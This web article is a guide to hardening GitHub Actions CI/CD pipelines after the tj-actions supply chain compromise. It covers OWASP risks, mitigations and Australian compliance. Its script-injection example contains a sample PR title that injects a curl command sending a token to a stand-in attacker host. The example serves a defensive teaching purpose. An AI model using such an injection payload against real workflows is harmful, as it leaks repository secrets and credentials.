Learn how to protect your CI/CD pipelines from supply chain attacks like tj-actions (CVE-2025-30066). Comprehensive enterprise hardening guide with Australian compliance mapping, OWASP best practices, and actionable security checklists.
In March 2025, the tj-actions/changed-files GitHub Action was compromised, exposing secrets from over 23,000 repositories in just 22 hours. AWS access keys, GitHub Personal Access Tokens, npm credentials, and private RSA keys were dumped to workflow logs and exfiltrated to attacker-controlled servers. Major organisations including Coinbase were targeted.
This wasn't an isolated incident. Supply chain attacks on CI/CD pipelines have increased 39% year-over-year, and 30% of all data breaches now involve third-party compromises. If you're running GitHub Actions without proper security hardening, your organisation is at risk.
This guide provides enterprise-grade security strategies to protect your GitHub Actions workflows, based on the latest threat intelligence, OWASP guidelines, and Australian compliance requirements.
The GitHub Actions Threat Landscape
GitHub Actions has become the dominant CI/CD platform, with 51% market adoption according to the CNCF 2024 survey. With over 6 billion monthly pipeline runs and 370% year-over-year growth, it's also become a prime target for attackers.
The Cost of CI/CD Breaches
Recent High-Profile Attacks
The tj-actions/changed-files compromise (CVE-2025-30066) represents a new class of supply chain attack targeting GitHub Actions directly.
Attack campaign begins
Attackers identify target actions
Initial compromise
spotbugs/sonar-findbugs exploited via pull_request_target
reviewdog compromised
~1,500 repositories affected in 2 hours
tj-actions compromised
23,000+ repositories exposed
CVE-2025-30066 disclosed
CVSS 8.6 severity rating
CISA advisory issued
Federal alert to all organisations
How the Attack Worked
The attackers exploited a chain of vulnerabilities across multiple actions:
Key insight: Version tags like @v1 or @v45 are mutable. Attackers simply moved the tags to point to malicious commits. Only workflows pinned to full commit SHAs were protected.
Understanding GitHub Actions Vulnerabilities
The OWASP CI/CD Security Top 10 provides a framework for understanding pipeline vulnerabilities. Here's how they apply to GitHub Actions:
OWASP CI/CD Top 10 Applied to GitHub Actions
| Risk | Description | GitHub Actions Impact |
|---|---|---|
| CICD-SEC-1 | Insufficient Flow Control | Missing branch protection, no required reviewers |
| CICD-SEC-2 | Inadequate IAM | Over-permissive GITHUB_TOKEN, no OIDC |
| CICD-SEC-3 | Dependency Chain Abuse | Unpinned actions, supply chain attacks |
| CICD-SEC-4 | Poisoned Pipeline Execution | pullrequesttarget misuse, script injection |
| CICD-SEC-5 | Insufficient PBAC | Missing environment protection rules |
| CICD-SEC-6 | Insufficient Credential Hygiene | Secrets in logs, no rotation policy |
| CICD-SEC-7 | Insecure System Configuration | Misconfigured self-hosted runners |
| CICD-SEC-8 | Ungoverned 3rd Party Services | Unvetted marketplace actions |
| CICD-SEC-9 | Improper Artifact Integrity | Missing SLSA attestations |
| CICD-SEC-10 | Insufficient Logging | No SIEM integration |
Common Attack Vectors
1. Script Injection
Untrusted input interpolated directly into shell commands enables arbitrary code execution:
Vulnerable pattern:
1# VULNERABLE - Attacker controls PR title2- name: Process PR3 run: echo "Title: github.event.pull_request.title"4 # Attacker sets title to: a"; curl attacker.com?t=TOKEN #Secure pattern:
1# SECURE - Use environment variable2- name: Process PR3 env:4 PR_TITLE: github.event.pull_request.title5 run: echo "Title: $PR_TITLE"Dangerous contexts to never interpolate:
github.event.pull_request.titlegithub.event.pull_request.bodygithub.event.issue.bodygithub.event.comment.bodygithub.head_ref(branch names)
2. The pullrequesttarget Trap
The pull_request_target event runs in the base repository context with full secret access, even for PRs from forks. This is extremely dangerous when combined with checking out PR code:
3. Secret Exfiltration Paths
Even without direct access to secrets, attackers have multiple exfiltration methods:
7 Enterprise Mitigation Strategies
Based on GitHub's official hardening guide, OWASP recommendations, and lessons from recent attacks, here are the essential security controls every enterprise should implement.
1. Pin Actions to Full Commit SHAs
This is the single most important mitigation against supply chain attacks like tj-actions. Version tags are mutable; commit SHAs are not.
Risk comparison by pinning strategy:
2. Implement Least-Privilege GITHUB_TOKEN
By default, repositories created before February 2023 grant read/write permissions to GITHUB_TOKEN. Research shows 86% of workflows don't limit these permissions.
1# Recommended: Set restrictive defaults at workflow level2permissions: {} # Forces explicit job-level permissions34jobs:5 build:6 runs-on: ubuntu-latest7 permissions:8 contents: read # Only read repository9 packages: write # Only if publishing packages10 steps:11 - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11Organisation-level setting: Navigate to Settings > Actions > General and set "Workflow permissions" to "Read repository contents and packages permissions".
3. Use OIDC for Cloud Authentication
OpenID Connect eliminates long-lived cloud credentials by exchanging short-lived tokens directly with cloud providers.
AWS OIDC Configuration:
1permissions:2 id-token: write3 contents: read45- uses: aws-actions/configure-aws-credentials@v46 with:7 role-to-assume: arn:aws:iam::123456789:role/github-actions8 aws-region: ap-southeast-2Azure OIDC Configuration:
1permissions:2 id-token: write3 contents: read45- uses: azure/login@v26 with:7 client-id: secrets.AZURE_CLIENT_ID8 tenant-id: secrets.AZURE_TENANT_ID9 subscription-id: secrets.AZURE_SUBSCRIPTION_IDGCP OIDC Configuration:
1permissions:2 id-token: write3 contents: read45- uses: google-github-actions/auth@v26 with:7 workload_identity_provider: projects/123/locations/global/workloadIdentityPools/github/providers/github8 service_account: github-actions@project.iam.gserviceaccount.com4. Configure Environment Protection Rules
Environments provide deployment gates with required approvals, wait timers, and branch restrictions.
Workflow configuration:
1jobs:2 deploy-production:3 runs-on: ubuntu-latest4 environment:5 name: production6 url: https://example.com7 permissions:8 id-token: write9 contents: read10 steps:11 - name: Deploy12 run: ./deploy.sh5. Enable Security Scanning in Your Pipeline
Integrate multiple security tools to catch vulnerabilities before deployment:
Recommended tools:
| Tool | Purpose | Integration |
|---|---|---|
| CodeQL | Static analysis (SAST) | Native GitHub, free for public repos |
| Dependabot | Dependency vulnerabilities | Native GitHub |
| GitGuardian/ggshield | Secret detection | GitHub Action available |
| Trivy | Container scanning | GitHub Action available |
| OSSF Scorecard | Supply chain assessment | GitHub Action available |
1# Example: CodeQL scanning workflow2name: CodeQL Analysis3on:4 push:5 branches: [main]6 pull_request:7 branches: [main]8 schedule:9 - cron: '0 6 * * 1' # Weekly scan1011jobs:12 analyze:13 runs-on: ubuntu-latest14 permissions:15 security-events: write16 contents: read17 steps:18 - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae1119 - uses: github/codeql-action/init@v320 with:21 languages: javascript, typescript22 - uses: github/codeql-action/analyze@v36. Harden Self-Hosted Runners
Self-hosted runners pose significant security risks. GitHub explicitly warns against using them with public repositories.
If you must use self-hosted runners:
Harden-Runner example:
1- uses: step-security/harden-runner@v22 with:3 egress-policy: audit # or 'block' for strict mode4 allowed-endpoints: >5 github.com:4436 api.github.com:4437 registry.npmjs.org:4437. Implement Audit Logging and Monitoring
Stream audit logs to your SIEM for security monitoring and incident response.
Key events to monitor:
| Event | Indicates |
|---|---|
workflows.completed_workflow_run | Workflow execution (success/failure) |
org.update_actions_secret | Secret modification |
protected_branch.policy_override | Branch protection bypass |
repo.actions_enabled | Actions enabled/disabled |
Native integrations: Splunk, Microsoft Sentinel, Datadog, AWS S3
Australian Compliance Considerations
For Australian enterprises, GitHub Actions security must align with regulatory requirements.
Essential Eight Mapping
The ACSC Essential Eight includes controls directly relevant to CI/CD security:
| Essential Eight Control | GitHub Actions Relevance |
|---|---|
| Application Control | Pin actions to SHAs, use allowlists |
| Patch Applications | Dependabot for dependency updates |
| Configure Microsoft Office Macros | N/A |
| User Application Hardening | Disable unnecessary features |
| Restrict Admin Privileges | Least-privilege GITHUB_TOKEN |
| Patch Operating Systems | Keep runner images updated |
| Multi-Factor Authentication | Enforce 2FA for GitHub org |
| Daily Backups | Not directly applicable |
Privacy Act and SOCI Act
- Privacy Act 1988: Applies to organisations with AU$3M+ turnover. Secrets management and access controls are essential for protecting personal information in CI/CD pipelines.
- SOCI Act 2021: Covers critical infrastructure across 11 sectors. Supply chain security obligations directly affect CI/CD systems processing critical infrastructure data.
GitHub Data Residency
As of February 2025, GitHub Enterprise Cloud offers data residency in Australia - the first APAC market. This enables:
- Code and data stored in Australian data centres
- Compliance with data sovereignty requirements
- Reduced latency for Australian teams
Enterprise Security Checklist
Use this checklist to assess and improve your GitHub Actions security posture:
1Audit Current State
Review all workflows for security issues. Check for unpinned actions, overly permissive tokens, and dangerous triggers.
# Find all workflows using unpinned actions
grep -r 'uses:.*@v[0-9]' .github/workflows/Incident Response Playbook
If you suspect a CI/CD compromise, follow this response process:
Conclusion
The GitHub Actions threat landscape has evolved significantly. The tj-actions attack demonstrated that even widely-used, trusted actions can be compromised. Enterprises must adopt a defence-in-depth approach:
- Pin all actions to SHA - The single most important mitigation
- Apply least-privilege permissions - Default to no permissions
- Use OIDC for cloud auth - Eliminate long-lived credentials
- Configure environment gates - Require approvals for production
- Enable security scanning - Catch vulnerabilities early
- Harden self-hosted runners - Or avoid them entirely
- Monitor audit logs - Detect and respond to incidents
The cost of implementing these controls is far less than the $4.44 million average breach cost - plus the additional $227,000 premium for supply chain incidents.
For Australian organisations, these practices align with Essential Eight requirements and support compliance with Privacy Act and SOCI Act obligations. With GitHub's new Australian data residency, you can achieve both security and sovereignty.
Need help securing your CI/CD pipelines?
References
Topics
Comments
Sign in to join the conversation
LoginNo comments yet. Be the first to share your thoughts!
Found an issue with this article?